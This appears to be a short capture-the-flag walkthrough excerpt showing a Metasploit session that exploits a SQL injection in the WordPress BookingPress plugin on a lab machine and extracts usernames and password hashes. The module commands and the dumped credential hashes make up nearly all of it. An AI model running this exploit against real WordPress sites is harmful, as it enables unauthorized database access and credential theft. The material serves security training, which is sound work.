Foothold

msf6 > use auxiliary/gather/wp_bookingpress_category_services_sqli
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > options

Module options (auxiliary/gather/wp_bookingpress_category_services_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:h
                                         ost:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploi
                                         t.com/docs/using-metasploit/basics/using-metas
                                         ploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /bookingpress/   yes       The URL of the BookingPress appointment bookin
                                         g page
   VHOST                       no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set rhosts 10.10.11.186
rhosts => 10.10.11.186
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set vhost metapress.htb
vhost => metapress.htb
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set targeturi events
targeturi => events
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run
[*] Running module against 10.10.11.186
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Extracting credential information
Wordpress User Credentials
==========================

 Username  Email                  Hash
 --------  -----                  ----
 admin     [email protected]    $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
 manager   [email protected]  $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70

[*] Auxiliary module execution completed